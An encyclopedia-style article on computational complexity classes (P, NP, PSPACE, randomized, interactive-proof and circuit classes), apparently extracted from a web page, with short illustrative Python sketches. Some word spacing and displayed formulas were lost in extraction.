actions from a given state, and "choosing" a branch that accepts (if any accept). That is, while a DTM must follow only one branch of computation, an NTM can be imagined as a computation tree, branching into many possible computational pathways at each step (see image). If at least one branch of the tree halts with an "accept" condition, then the NTM accepts the input. In this way, an NTM can be thought of as simultaneously exploring all computational possibilities in parallel and selecting an accepting branch.[3]NTMs are not meant to be physically realizable models, they are simply theoretically interesting abstract machines that give rise to a number of interesting complexity classes (which often do have physically realizable equivalent definitions). Thetime complexityof an NTM is the maximum number of steps that the NTM uses onanybranch of its computation.[4]Similarly, thespace complexityof an NTM is the maximum number of cells that the NTM uses on any branch of its computation. DTMs can be viewed as a special case of NTMs that do not make use of the power of nondeterminism. 
Hence, every computation that can be carried out by a DTM can also be carried out by an equivalent NTM. It is also possible to simulate any NTM using a DTM (the DTM will simply compute every possible computational branch one-by-one). Hence, the two are equivalent in terms of computability. However, simulating an NTM with a DTM often requires greater time and/or memory resources; as will be seen, how significant this slowdown is for certain classes of computational problems is an important question in computational complexity theory. Complexity classes group computational problems by their resource requirements. To do this, computational problems are differentiated byupper boundson the maximum amount of resources that the most efficient algorithm takes to solve them. More specifically, complexity classes are concerned with therate of growthin the resources required to solve particular computational problems as the input size increases. For example, the amount of time it takes to solve problems in the complexity classPgrows at apolynomialrate as the input size increases, which is slow compared to problems in the exponential complexity classEXPTIME(or more accurately, for problems inEXPTIMEthat are outside ofP, sinceP⊆EXPTIME{\displaystyle {\mathsf {P}}\subseteq {\mathsf {EXPTIME}}}). Note that the study of complexity classes is intended primarily to understand theinherentcomplexity required to solve computational problems. Complexity theorists are thus generally concerned with finding the smallest complexity class that a problem falls into; that is, they seek to classify a problem according to themost efficientalgorithm that solves it. There may be an algorithm, for instance, that solves a particular problem in exponential time, but if the most efficient algorithm for solving this problem runs in polynomial time then the inherent time complexity of that problem is better described as polynomial. Thetime complexityof an algorithm with respect to the Turing machine model is the number of steps it takes for a Turing machine to run an algorithm on a given input size. Formally, the time complexity for an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functiontM:N→N{\displaystyle t_{M}:\mathbb {N} \to \mathbb {N} }, wheretM(n){\displaystyle t_{M}(n)}is the maximum number of steps thatM{\displaystyle M}takes on any input of lengthn{\displaystyle n}. In computational complexity theory, theoretical computer scientists are concerned less with particular runtime values and more with the general class of functions that the time complexity function falls into. For instance, is the time complexity function apolynomial? Alogarithmic function? Anexponential function? Or another kind of function? Thespace complexityof an algorithm with respect to the Turing machine model is the number of cells on the Turing machine's tape that are required to run an algorithm on a given input size. Formally, the space complexity of an algorithm implemented with a Turing machineM{\displaystyle M}is defined as the functionsM:N→N{\displaystyle s_{M}:\mathbb {N} \to \mathbb {N} }, wheresM(n){\displaystyle s_{M}(n)}is the maximum number of cells thatM{\displaystyle M}uses on any input of lengthn{\displaystyle n}. Complexity classes are often defined using granular sets of complexity classes calledDTIMEandNTIME(for time complexity) andDSPACEandNSPACE(for space complexity). 
Usingbig O notation, they are defined as follows: Pis the class of problems that are solvable by adeterministic Turing machineinpolynomial timeandNPis the class of problems that are solvable by anondeterministic Turing machinein polynomial time. Or more formally, Pis often said to be the class of problems that can be solved "quickly" or "efficiently" by a deterministic computer, since thetime complexityof solving a problem inPincreases relatively slowly with the input size. An important characteristic of the classNPis that it can be equivalently defined as the class of problems whose solutions areverifiableby a deterministic Turing machine in polynomial time. That is, a language is inNPif there exists adeterministicpolynomial time Turing machine, referred to as the verifier, that takes as input a stringw{\displaystyle w}anda polynomial-sizecertificatestringc{\displaystyle c}, and acceptsw{\displaystyle w}ifw{\displaystyle w}is in the language and rejectsw{\displaystyle w}ifw{\displaystyle w}is not in the language. Intuitively, the certificate acts as aproofthat the inputw{\displaystyle w}is in the language. Formally:[5] This equivalence between the nondeterministic definition and the verifier definition highlights a fundamental connection betweennondeterminismand solution verifiability. Furthermore, it also provides a useful method for proving that a language is inNP—simply identify a suitable certificate and show that it can be verified in polynomial time. While there might seem to be an obvious difference between the class of problems that are efficiently solvable and the class of problems whose solutions are merely efficiently checkable,PandNPare actually at the center of one of the most famous unsolved problems in computer science: thePversusNPproblem. While it is known thatP⊆NP{\displaystyle {\mathsf {P}}\subseteq {\mathsf {NP}}}(intuitively, deterministic Turing machines are just a subclass of nondeterministic Turing machines that don't make use of their nondeterminism; or under the verifier definition,Pis the class of problems whose polynomial time verifiers need only receive the empty string as their certificate), it is not known whetherNPis strictly larger thanP. IfP=NP, then it follows that nondeterminism providesno additional computational powerover determinism with regards to the ability to quickly find a solution to a problem; that is, being able to exploreall possible branchesof computation providesat mosta polynomial speedup over being able to explore only a single branch. Furthermore, it would follow that if there exists a proof for a problem instance and that proof can quickly be checked for correctness (that is, if the problem is inNP), then there also exists an algorithm that can quicklyconstructthat proof (that is, the problem is inP).[6]However, the overwhelming majority of computer scientists believe thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}},[7]and mostcryptographic schemesemployed today rely on the assumption thatP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[8] EXPTIME(sometimes shortened toEXP) is the class of decision problems solvable by a deterministic Turing machine in exponential time andNEXPTIME(sometimes shortened toNEXP) is the class of decision problems solvable by a nondeterministic Turing machine in exponential time. Or more formally, EXPTIMEis a strict superset ofPandNEXPTIMEis a strict superset ofNP. It is further the case thatEXPTIME⊆{\displaystyle \subseteq }NEXPTIME. 
It is not known whether this is proper, but ifP=NPthenEXPTIMEmust equalNEXPTIME. While it is possible to definelogarithmictime complexity classes, these are extremely narrow classes as sublinear times do not even enable a Turing machine to read the entire input (becauselog⁡n<n{\displaystyle \log n<n}).[a][9]However, there are a meaningful number of problems that can be solved in logarithmic space. The definitions of these classes require atwo-tape Turing machineso that it is possible for the machine to store the entire input (it can be shown that in terms ofcomputabilitythe two-tape Turing machine is equivalent to the single-tape Turing machine).[10]In the two-tape Turing machine model, one tape is the input tape, which is read-only. The other is the work tape, which allows both reading and writing and is the tape on which the Turing machine performs computations. The space complexity of the Turing machine is measured as the number of cells that are used on the work tape. L(sometimes lengthened toLOGSPACE) is then defined as the class of problems solvable in logarithmic space on a deterministic Turing machine andNL(sometimes lengthened toNLOGSPACE) is the class of problems solvable in logarithmic space on a nondeterministic Turing machine. Or more formally,[10] It is known thatL⊆NL⊆P{\displaystyle {\mathsf {L}}\subseteq {\mathsf {NL}}\subseteq {\mathsf {P}}}. However, it is not known whether any of these relationships is proper. The complexity classesPSPACEandNPSPACEare the space analogues toPandNP. That is,PSPACEis the class of problems solvable in polynomial space by a deterministic Turing machine andNPSPACEis the class of problems solvable in polynomial space by a nondeterministic Turing machine. More formally, While it is not known whetherP=NP,Savitch's theoremfamously showed thatPSPACE=NPSPACE. It is also known thatP⊆PSPACE{\displaystyle {\mathsf {P}}\subseteq {\mathsf {PSPACE}}}, which follows intuitively from the fact that, since writing to a cell on a Turing machine's tape is defined as taking one unit of time, a Turing machine operating in polynomial time can only write to polynomially many cells. It is suspected thatPis strictly smaller thanPSPACE, but this has not been proven. The complexity classesEXPSPACEandNEXPSPACEare the space analogues toEXPTIMEandNEXPTIME. That is,EXPSPACEis the class of problems solvable in exponential space by a deterministic Turing machine andNEXPSPACEis the class of problems solvable in exponential space by a nondeterministic Turing machine. Or more formally, Savitch's theoremshowed thatEXPSPACE=NEXPSPACE. This class is extremely broad: it is known to be a strict superset ofPSPACE,NP, andP, and is believed to be a strict superset ofEXPTIME. Complexity classes have a variety ofclosureproperties. For example, decision classes may be closed undernegation,disjunction,conjunction, or even under allBoolean operations. Moreover, they might also be closed under a variety of quantification schemes.P, for instance, is closed under all Boolean operations, and under quantification over polynomially sized domains. Closure properties can be helpful in separating classes—one possible route to separating two complexity classes is to find some closure property possessed by one class but not by the other. 
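Returning to the verifier-based characterization of NP described earlier, the contrast between checking a certificate and searching for one can be illustrated with a short sketch. The Python code below is an assumption made purely for illustration (SUBSET-SUM is used as the example NP language, and the function names are invented here): the verifier runs in polynomial time, while the naive decider searches over exponentially many candidate certificates.

```python
from itertools import combinations

def verify_subset_sum(numbers, target, certificate):
    """Polynomial-time verifier: the certificate is a list of distinct indices."""
    return (len(set(certificate)) == len(certificate)
            and all(0 <= i < len(numbers) for i in certificate)
            and sum(numbers[i] for i in certificate) == target)

def decide_subset_sum(numbers, target):
    """Naive decider: search over all (exponentially many) candidate certificates."""
    return any(verify_subset_sum(numbers, target, list(c))
               for r in range(len(numbers) + 1)
               for c in combinations(range(len(numbers)), r))

if __name__ == "__main__":
    nums, t = [3, 34, 4, 12, 5, 2], 9
    print(verify_subset_sum(nums, t, [2, 4]))   # True: 4 + 5 = 9, checked quickly
    print(decide_subset_sum(nums, t))           # True, but found by exhaustive search
```

Whether the exhaustive search in the second function can always be replaced by a polynomial-time procedure is exactly the P versus NP question discussed above.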
Each classXthat is not closed under negation has a complement classco-X, which consists of the complements of the languages contained inX(i.e.co-X={L|L¯∈X}{\displaystyle {\textsf {co-X}}=\{L|{\overline {L}}\in {\mathsf {X}}\}}).co-NP, for instance, is one important complement complexity class, and sits at the center of the unsolved problem over whetherco-NP=NP. Closure properties are one of the key reasons many complexity classes are defined in the way that they are.[11]Take, for example, a problem that can be solved inO(n){\displaystyle O(n)}time (that is, in linear time) and one that can be solved in, at best,O(n1000){\displaystyle O(n^{1000})}time. Both of these problems are inP, yet the runtime of the second grows considerably faster than the runtime of the first as the input size increases. One might ask whether it would be better to define the class of "efficiently solvable" problems using some smaller polynomial bound, likeO(n3){\displaystyle O(n^{3})}, rather than all polynomials, which allows for such large discrepancies. It turns out, however, that the set of all polynomials is the smallest class of functions containing the linear functions that is also closed under addition, multiplication, and composition (for instance,O(n3)∘O(n2)=O(n6){\displaystyle O(n^{3})\circ O(n^{2})=O(n^{6})}, which is a polynomial butO(n6)>O(n3){\displaystyle O(n^{6})>O(n^{3})}).[11]Since we would like composing one efficient algorithm with another efficient algorithm to still be considered efficient, the polynomials are the smallest class that ensures composition of "efficient algorithms".[12](Note that the definition ofPis also useful because, empirically, almost all problems inPthat are practically useful do in fact have low order polynomial runtimes, and almost all problems outside ofPthat are practically useful do not have any known algorithms with small exponential runtimes, i.e. withO(cn){\displaystyle O(c^{n})}runtimes wherecis close to 1.[13]) Many complexity classes are defined using the concept of areduction. A reduction is a transformation of one problem into another problem, i.e. a reduction takes inputs from one problem and transforms them into inputs of another problem. For instance, you can reduce ordinary base-10 additionx+y{\displaystyle x+y}to base-2 addition by transformingx{\displaystyle x}andy{\displaystyle y}to their base-2 notation (e.g. 5+7 becomes 101+111). Formally, a problemX{\displaystyle X}reduces to a problemY{\displaystyle Y}if there exists a functionf{\displaystyle f}such that for everyx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only iff(x)∈Y{\displaystyle f(x)\in Y}. Generally, reductions are used to capture the notion of a problem being at least as difficult as another problem. Thus we are generally interested in using a polynomial-time reduction, since any problemX{\displaystyle X}that can be efficiently reduced to another problemY{\displaystyle Y}is no more difficult thanY{\displaystyle Y}. Formally, a problemX{\displaystyle X}is polynomial-time reducible to a problemY{\displaystyle Y}if there exists apolynomial-timecomputable functionp{\displaystyle p}such that for allx∈Σ∗{\displaystyle x\in \Sigma ^{*}},x∈X{\displaystyle x\in X}if and only ifp(x)∈Y{\displaystyle p(x)\in Y}. Note that reductions can be defined in many different ways. Common reductions areCook reductions,Karp reductionsandLevin reductions, and can vary based on resource bounds, such aspolynomial-time reductionsandlog-space reductions. 
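As a concrete illustration of a polynomial-time reduction, the sketch below (an example chosen for this illustration, not taken from the text above) implements the classic map from INDEPENDENT-SET to VERTEX-COVER: an instance (G, k) is sent to (G, n − k), where n is the number of vertices, because a graph has an independent set of size k exactly when it has a vertex cover of size n − k.

```python
from itertools import combinations

# Illustrative polynomial-time (many-one) reduction: INDEPENDENT-SET to VERTEX-COVER.

def reduce_independent_set_to_vertex_cover(graph, k):
    """graph: dict vertex -> set of neighbours.  The reduction runs in polynomial time."""
    return graph, len(graph) - k          # an instance of VERTEX-COVER

def has_vertex_cover(graph, size):
    """Brute-force decider for VERTEX-COVER, used here only to check the reduction."""
    edges = {frozenset((u, v)) for u in graph for v in graph[u]}
    return any(all(u in cover or v in cover for u, v in map(tuple, edges))
               for cover in combinations(graph, size))

if __name__ == "__main__":
    # A triangle {a, b, c} with an extra vertex d attached to a.
    g = {"a": {"b", "c", "d"}, "b": {"a", "c"}, "c": {"a", "b"}, "d": {"a"}}
    k = 2                                 # {b, d} is an independent set of size 2
    print(has_vertex_cover(*reduce_independent_set_to_vertex_cover(g, k)))   # True
```

Only the mapping itself needs to be efficient; the brute-force decider above is included solely to check that the transformed instance has the same yes/no answer as the original.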
Reductions motivate the concept of a problem beinghardfor a complexity class. A problemX{\displaystyle X}is hard for a class of problemsCif every problem inCcan be polynomial-time reduced toX{\displaystyle X}. Thus no problem inCis harder thanX{\displaystyle X}, since an algorithm forX{\displaystyle X}allows us to solve any problem inCwith at most polynomial slowdown. Of particular importance, the set of problems that are hard forNPis called the set ofNP-hardproblems. If a problemX{\displaystyle X}is hard forCand is also inC, thenX{\displaystyle X}is said to becompleteforC. This means thatX{\displaystyle X}is the hardest problem inC(more precisely, since there could be many problems that are equally hard,X{\displaystyle X}is as hard as the hardest problems inC). Of particular importance is the class ofNP-completeproblems—the most difficult problems inNP. Because all problems inNPcan be polynomial-time reduced toNP-complete problems, finding anNP-complete problem that can be solved in polynomial time would mean thatP=NP. Savitch's theorem establishes the relationship between deterministic and nondeterministic space resources. It shows that if a nondeterministic Turing machine can solve a problem usingf(n){\displaystyle f(n)}space, then a deterministic Turing machine can solve the same problem inf(n)2{\displaystyle f(n)^{2}}space, i.e. in the square of the space. Formally, Savitch's theorem states that for anyf(n)>n{\displaystyle f(n)>n},[14]NSPACE(f(n))⊆DSPACE(f(n)2){\displaystyle {\mathsf {NSPACE}}(f(n))\subseteq {\mathsf {DSPACE}}(f(n)^{2})}. Important corollaries of Savitch's theorem are thatPSPACE=NPSPACE(since the square of a polynomial is still a polynomial) andEXPSPACE=NEXPSPACE(since the square of an exponential is still an exponential). These relationships answer fundamental questions about the power of nondeterminism compared to determinism. Specifically, Savitch's theorem shows that any problem that a nondeterministic Turing machine can solve in polynomial space, a deterministic Turing machine can also solve in polynomial space. Similarly, any problem that a nondeterministic Turing machine can solve in exponential space, a deterministic Turing machine can also solve in exponential space. By definition ofDTIME, it follows thatDTIME(nk1){\displaystyle {\mathsf {DTIME}}(n^{k_{1}})}is contained inDTIME(nk2){\displaystyle {\mathsf {DTIME}}(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}, sinceO(nk1)⊆O(nk2){\displaystyle O(n^{k_{1}})\subseteq O(n^{k_{2}})}ifk1≤k2{\displaystyle k_{1}\leq k_{2}}. However, this definition gives no indication of whether this inclusion is strict. For time and space requirements, the conditions under which the inclusion is strict are given by the time and space hierarchy theorems, respectively. They are called hierarchy theorems because they induce a proper hierarchy on the classes defined by constraining the respective resources. The hierarchy theorems enable one to make quantitative statements about how much additional time or space is needed in order to increase the number of problems that can be solved. Thetime hierarchy theoremstates that Thespace hierarchy theoremstates that The time and space hierarchy theorems form the basis for most separation results of complexity classes. For instance, the time hierarchy theorem establishes thatPis strictly contained inEXPTIME, and the space hierarchy theorem establishes thatLis strictly contained inPSPACE. While deterministic and non-deterministicTuring machinesare the most commonly used models of computation, many complexity classes are defined in terms of other computational models. 
In particular, These are explained in greater detail below. A number of important complexity classes are defined using theprobabilistic Turing machine, a variant of theTuring machinethat can toss random coins. These classes help to better describe the complexity ofrandomized algorithms. A probabilistic Turing machine is similar to a deterministic Turing machine, except rather than following a single transition function (a set of rules for how to proceed at each step of the computation) it probabilistically selects between multiple transition functions at each step. The standard definition of a probabilistic Turing machine specifies two transition functions, so that the selection of transition function at each step resembles a coin flip. The randomness introduced at each step of the computation introduces the potential for error; that is, strings that the Turing machine is meant to accept may on some occasions be rejected and strings that the Turing machine is meant to reject may on some occasions be accepted. As a result, the complexity classes based on the probabilistic Turing machine are defined in large part around the amount of error that is allowed. Formally, they are defined using an error probabilityϵ{\displaystyle \epsilon }. A probabilistic Turing machineM{\displaystyle M}is said to recognize a languageL{\displaystyle L}with error probabilityϵ{\displaystyle \epsilon }if: The fundamental randomized time complexity classes areZPP,RP,co-RP,BPP, andPP. The strictest class isZPP(zero-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability 0. Intuitively, this is the strictest class of probabilistic problems because it demandsno error whatsoever. A slightly looser class isRP(randomized polynomial time), which maintains no error for strings not in the language but allows bounded error for strings in the language. More formally, a language is inRPif there is a probabilistic polynomial-time Turing machineM{\displaystyle M}such that if a string is not in the language thenM{\displaystyle M}always rejects and if a string is in the language thenM{\displaystyle M}accepts with a probability at least 1/2. The classco-RPis similarly defined except the roles are flipped: error is not allowed for strings in the language but is allowed for strings not in the language. Taken together, the classesRPandco-RPencompass all of the problems that can be solved by probabilistic Turing machines withone-sided error. Loosening the error requirements further to allow fortwo-sided erroryields the classBPP(bounded-error probabilistic polynomial time), the class of problems solvable in polynomial time by a probabilistic Turing machine with error probability less than 1/3 (for both strings in the language and not in the language).BPPis the most practically relevant of the probabilistic complexity classes—problems inBPPhave efficientrandomized algorithmsthat can be run quickly on real computers.BPPis also at the center of the important unsolved problem in computer science over whetherP=BPP, which if true would mean that randomness does not increase the computational power of computers, i.e. any probabilistic Turing machine could be simulated by a deterministic Turing machine with at most polynomial slowdown. 
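As an illustration of the one-sided error allowed by classes such as RP and co-RP, the sketch below implements Freivalds' algorithm for checking matrix products. The choice of this particular algorithm and the helper names are assumptions made for the example, not something stated in the text above: if A·B = C the algorithm always answers "yes", and if A·B ≠ C each trial answers "no" with probability at least 1/2, so repeating k independent trials drives the false-accept probability below 2^-k.

```python
import random

def freivalds(A, B, C, trials=20):
    """Randomized check of whether A*B == C in O(n^2) time per trial (one-sided error)."""
    n = len(A)
    for _ in range(trials):
        r = [random.randint(0, 1) for _ in range(n)]          # random 0/1 vector
        Br = [sum(B[i][j] * r[j] for j in range(n)) for i in range(n)]
        ABr = [sum(A[i][j] * Br[j] for j in range(n)) for i in range(n)]
        Cr = [sum(C[i][j] * r[j] for j in range(n)) for i in range(n)]
        if ABr != Cr:
            return False          # a witness was found: A*B is definitely not C
    return True                   # no error is possible when A*B truly equals C

if __name__ == "__main__":
    A = [[1, 2], [3, 4]]
    B = [[5, 6], [7, 8]]
    C_good = [[19, 22], [43, 50]]
    C_bad = [[19, 22], [43, 51]]
    print(freivalds(A, B, C_good))   # True
    print(freivalds(A, B, C_bad))    # almost certainly False
```

The ability to repeat trials and shrink the error probability is what makes the bounded-error classes described above robust in practice.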
The broadest of these probabilistic classes isPP(probabilistic polynomial time), the set of languages solvable by a probabilistic Turing machine in polynomial time with an error probability of less than 1/2 for all strings. ZPP,RPandco-RPare all subsets ofBPP, which in turn is a subset ofPP. The reason for this is intuitive: the classes allowing zero error and only one-sided error are all contained within the class that allows two-sided error, andPPsimply relaxes the error probability ofBPP.ZPPrelates toRPandco-RPin the following way:ZPP=RP∩co-RP{\displaystyle {\textsf {ZPP}}={\textsf {RP}}\cap {\textsf {co-RP}}}. That is,ZPPconsists exactly of those problems that are in bothRPandco-RP. Intuitively, this follows from the fact thatRPandco-RPallow only one-sided error:co-RPdoes not allow error for strings in the language andRPdoes not allow error for strings not in the language. Hence, if a problem is in bothRPandco-RP, then there must be no error for strings both inandnot in the language (i.e. no error whatsoever), which is exactly the definition ofZPP. Important randomized space complexity classes includeBPL,RL, andRLP. A number of complexity classes are defined usinginteractive proof systems. Interactive proofs generalize the proof-based definition of the complexity classNPand yield insights intocryptography,approximation algorithms, andformal verification. Interactive proof systems areabstract machinesthat model computation as the exchange of messages between two parties: a proverP{\displaystyle P}and a verifierV{\displaystyle V}. The parties interact by exchanging messages, and an input string is accepted by the system if the verifier decides to accept the input on the basis of the messages it has received from the prover. The proverP{\displaystyle P}has unlimited computational power while the verifier has bounded computational power (the standard definition of interactive proof systems defines the verifier to be polynomial-time bounded). The prover, however, is untrustworthy (this prevents all languages from being trivially recognized by the proof system by having the computationally unbounded prover solve for whether a string is in a language and then sending a trustworthy "YES" or "NO" to the verifier), so the verifier must conduct an "interrogation" of the prover by "asking it" successive rounds of questions, accepting only if it develops a high degree of confidence that the string is in the language.[15] The classNPis a simple proof system in which the verifier is restricted to being a deterministic polynomial-timeTuring machineand the procedure is restricted to one round (that is, the prover sends only a single, full proof—typically referred to as thecertificate—to the verifier). Put another way, the definition of the classNP(the set of decision problems for which the problem instances, when the answer is "YES", have proofs verifiable in polynomial time by a deterministic Turing machine) describes a proof system in which the proof is constructed by an unmentioned prover and the deterministic Turing machine is the verifier. For this reason,NPcan also be calleddIP(deterministic interactive proof), though it is rarely referred to as such. It turns out thatNPcaptures the full power of interactive proof systems with deterministic (polynomial-time) verifiers because it can be shown that for any proof system with a deterministic verifier it is never necessary to use more than a single round of messaging between the prover and the verifier. 
Interactive proof systems that provide greater computational power over standard complexity classes thus requireprobabilisticverifiers, which means that the verifier's questions to the prover are computed usingprobabilistic algorithms. As noted in the section above onrandomized computation, probabilistic algorithms introduce error into the system, so complexity classes based on probabilistic proof systems are defined in terms of an error probabilityϵ{\displaystyle \epsilon }. The most general complexity class arising out of this characterization is the classIP(interactive polynomial time), which is the class of all problems solvable by an interactive proof system(P,V){\displaystyle (P,V)}, whereV{\displaystyle V}is probabilistic polynomial-time and the proof system satisfies two properties: for a languageL∈IP{\displaystyle L\in {\mathsf {IP}}} An important feature ofIPis that it equalsPSPACE. In other words, any problem that can be solved by a polynomial-time interactive proof system can also be solved by adeterministic Turing machinewith polynomial space resources, and vice versa. A modification of the protocol forIPproduces another important complexity class:AM(Arthur–Merlin protocol). In the definition of interactive proof systems used byIP, the prover was not able to see the coins utilized by the verifier in its probabilistic computation—it was only able to see the messages that the verifier produced with these coins. For this reason, the coins are calledprivate random coins. The interactive proof system can be constrained so that the coins used by the verifier arepublic random coins; that is, the prover is able to see the coins. Formally,AMis defined as the class of languages with an interactive proof in which the verifier sends a random string to the prover, the prover responds with a message, and the verifier either accepts or rejects by applying a deterministic polynomial-time function to the message from the prover.AMcan be generalized toAM[k], wherekis the number of messages exchanged (so in the generalized form the standardAMdefined above isAM[2]). However, it is the case that for allk≥2{\displaystyle k\geq 2},AM[k]=AM[2]. It is also the case thatAM[k]⊆IP[k]{\displaystyle {\mathsf {AM}}[k]\subseteq {\mathsf {IP}}[k]}. Other complexity classes defined using interactive proof systems includeMIP(multiprover interactive polynomial time) andQIP(quantum interactive polynomial time). An alternative model of computation to theTuring machineis theBoolean circuit, a simplified model of thedigital circuitsused in moderncomputers. Not only does this model provide an intuitive connection between computation in theory and computation in practice, but it is also a natural model fornon-uniform computation(computation in which different input sizes within the same problem use different algorithms). Formally, a Boolean circuitC{\displaystyle C}is adirected acyclic graphin which edges represent wires (which carry thebitvalues 0 and 1), the input bits are represented by source vertices (vertices with no incoming edges), and all non-source vertices representlogic gates(generally theAND,OR, andNOT gates). One logic gate is designated the output gate, and represents the end of the computation. 
The input/output behavior of a circuitC{\displaystyle C}withn{\displaystyle n}input variables is represented by theBoolean functionfC:{0,1}n→{0,1}{\displaystyle f_{C}:\{0,1\}^{n}\to \{0,1\}}; for example, on input bitsx1,x2,...,xn{\displaystyle x_{1},x_{2},...,x_{n}}, the output bitb{\displaystyle b}of the circuit is represented mathematically asb=fC(x1,x2,...,xn){\displaystyle b=f_{C}(x_{1},x_{2},...,x_{n})}. The circuitC{\displaystyle C}is said tocomputethe Boolean functionfC{\displaystyle f_{C}}. Any particular circuit has a fixed number of input vertices, so it can only act on inputs of that size.Languages(the formal representations ofdecision problems), however, contain strings of differing lengths, so languages cannot be fully captured by a single circuit (this contrasts with the Turing machine model, in which a language is fully described by a single Turing machine that can act on any input size). A language is thus represented by acircuit family. A circuit family is an infinite list of circuits(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}, whereCn{\displaystyle C_{n}}is a circuit withn{\displaystyle n}input variables. A circuit family is said to decide a languageL{\displaystyle L}if, for every stringw{\displaystyle w},w{\displaystyle w}is in the languageL{\displaystyle L}if and only ifCn(w)=1{\displaystyle C_{n}(w)=1}, wheren{\displaystyle n}is the length ofw{\displaystyle w}. In other words, a stringw{\displaystyle w}of sizen{\displaystyle n}is in the language represented by the circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}if the circuitCn{\displaystyle C_{n}}(the circuit with the same number of input vertices as the number of bits inw{\displaystyle w}) evaluates to 1 whenw{\displaystyle w}is its input. While complexity classes defined using Turing machines are described in terms oftime complexity, circuit complexity classes are defined in terms of circuit size — the number of vertices in the circuit. The size complexity of a circuit family(C0,C1,C2,...){\displaystyle (C_{0},C_{1},C_{2},...)}is the functionf:N→N{\displaystyle f:\mathbb {N} \to \mathbb {N} }, wheref(n){\displaystyle f(n)}is the circuit size ofCn{\displaystyle C_{n}}. The familiar function classes follow naturally from this; for example, a polynomial-size circuit family is one such that the functionf{\displaystyle f}is apolynomial. The complexity classP/polyis the set of languages that are decidable by polynomial-size circuit families. It turns out that there is a natural connection between circuit complexity and time complexity. Intuitively, a language with small time complexity (that is, requires relatively few sequential operations on a Turing machine), also has a small circuit complexity (that is, requires relatively few Boolean operations). Formally, it can be shown that if a language is inDTIME(t(n)){\displaystyle {\mathsf {DTIME}}(t(n))}, wheret{\displaystyle t}is a functiont:N→N{\displaystyle t:\mathbb {N} \to \mathbb {N} }, then it has circuit complexityO(t2(n)){\displaystyle O(t^{2}(n))}.[16]It follows directly from this fact thatP⊂P/poly{\displaystyle {\mathsf {\color {Blue}P}}\subset {\textsf {P/poly}}}. In other words, any problem that can be solved in polynomial time by a deterministic Turing machine can also be solved by a polynomial-size circuit family. It is further the case that the inclusion is proper, i.e.P⊊P/poly{\displaystyle {\textsf {P}}\subsetneq {\textsf {P/poly}}}(for example, there are someundecidable problemsthat are inP/poly). 
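A Boolean circuit of the kind described above can be evaluated with a straightforward recursion over its directed acyclic graph. The following Python sketch is illustrative only (the gate encoding and the example XOR circuit are assumptions made here); a circuit family would supply one such circuit for every input length n.

```python
# Minimal sketch of evaluating a Boolean circuit represented as a DAG.
# gates: dict wire_name -> ("AND" | "OR" | "NOT", [input wire names]).

def evaluate_circuit(gates, output, inputs):
    """Return the output bit of the circuit for the given input assignment."""
    values = dict(inputs)              # known wire values, seeded with the inputs

    def value(wire):
        if wire not in values:
            kind, args = gates[wire]
            bits = [value(a) for a in args]
            if kind == "AND":
                values[wire] = int(all(bits))
            elif kind == "OR":
                values[wire] = int(any(bits))
            else:                      # NOT gate
                values[wire] = 1 - bits[0]
        return values[wire]

    return value(output)

if __name__ == "__main__":
    # Circuit computing XOR(x1, x2) = (x1 OR x2) AND NOT(x1 AND x2); size 4 (non-input gates).
    gates = {
        "or1":  ("OR",  ["x1", "x2"]),
        "and1": ("AND", ["x1", "x2"]),
        "not1": ("NOT", ["and1"]),
        "out":  ("AND", ["or1", "not1"]),
    }
    for x1 in (0, 1):
        for x2 in (0, 1):
            print(x1, x2, evaluate_circuit(gates, "out", {"x1": x1, "x2": x2}))
```

In this representation the circuit-size complexity discussed below corresponds simply to the number of entries in the gate dictionary for the circuit handling each input length.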
P/polyhas a number of properties that make it highly useful in the study of the relationships between complexity classes. In particular, it is helpful in investigating problems related toPversusNP. For example, if there is any language inNPthat is not inP/poly, thenP≠NP{\displaystyle {\mathsf {P}}\neq {\mathsf {NP}}}.[17]P/polyis also helpful in investigating properties of thepolynomial hierarchy. For example, ifNP⊆P/poly, thenPHcollapses toΣ2P{\displaystyle \Sigma _{2}^{\mathsf {P}}}. A full description of the relations betweenP/polyand other complexity classes is available at "Importance of P/poly".P/polyis also helpful in the general study of the properties ofTuring machines, as the class can be equivalently defined as the class of languages recognized by a polynomial-time Turing machine with a polynomial-boundedadvice function. Two subclasses ofP/polythat have interesting properties in their own right areNCandAC. These classes are defined not only in terms of their circuit size but also in terms of theirdepth. The depth of a circuit is the length of the longestdirected pathfrom an input node to the output node. The classNCis the set of languages that can be solved by circuit families that are restricted not only to having polynomial-size but also to having polylogarithmic depth. The classACis defined similarly toNC, however gates are allowed to have unbounded fan-in (that is, the AND and OR gates can be applied to more than two bits).NCis a notable class because it can be equivalently defined as the class of languages that have efficientparallel algorithms. The classesBQPandQMA, which are of key importance inquantum information science, are defined usingquantum Turing machines. While most complexity classes studied by computer scientists are sets ofdecision problems, there are also a number of complexity classes defined in terms of other types of problems. In particular, there are complexity classes consisting ofcounting problems,function problems, andpromise problems. These are explained in greater detail below. Acounting problemasks not onlywhethera solution exists (as with adecision problem), but askshow manysolutions exist.[18]For example, the decision problemCYCLE{\displaystyle {\texttt {CYCLE}}}askswhethera particular graphG{\displaystyle G}has asimple cycle(the answer is a simple yes/no); the corresponding counting problem#CYCLE{\displaystyle \#{\texttt {CYCLE}}}(pronounced "sharp cycle") askshow manysimple cyclesG{\displaystyle G}has.[19]The output to a counting problem is thus a number, in contrast to the output for a decision problem, which is a simple yes/no (or accept/reject, 0/1, or other equivalent scheme).[20] Thus, whereas decision problems are represented mathematically asformal languages, counting problems are represented mathematically asfunctions: a counting problem is formalized as the functionf:{0,1}∗→N{\displaystyle f:\{0,1\}^{*}\to \mathbb {N} }such that for every inputw∈{0,1}∗{\displaystyle w\in \{0,1\}^{*}},f(w){\displaystyle f(w)}is the number of solutions. For example, in the#CYCLE{\displaystyle \#{\texttt {CYCLE}}}problem, the input is a graphG∈{0,1}∗{\displaystyle G\in \{0,1\}^{*}}(a graph represented as a string ofbits) andf(G){\displaystyle f(G)}is the number of simple cycles inG{\displaystyle G}. 
